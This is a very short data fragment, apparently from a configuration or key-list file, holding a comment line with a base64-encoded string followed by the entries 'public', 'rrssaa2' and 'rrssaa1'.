# +qyVMEei1eN3YbV/z2kjcaCKngWc2pW2/e7HwpXKaj0=

public

rrssaa2

rrssaa1